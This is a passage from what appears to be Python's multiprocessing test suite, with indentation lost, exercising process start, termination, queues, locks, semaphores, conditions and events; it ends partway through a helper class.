self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
        # Currently fails on OS X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily due to API shear; this does not
        # work with threading._Event objects (is_set == isSet).
        self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() will return the value of the __flag
        # instead of None.  API shear with the semaphore-backed mp.Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
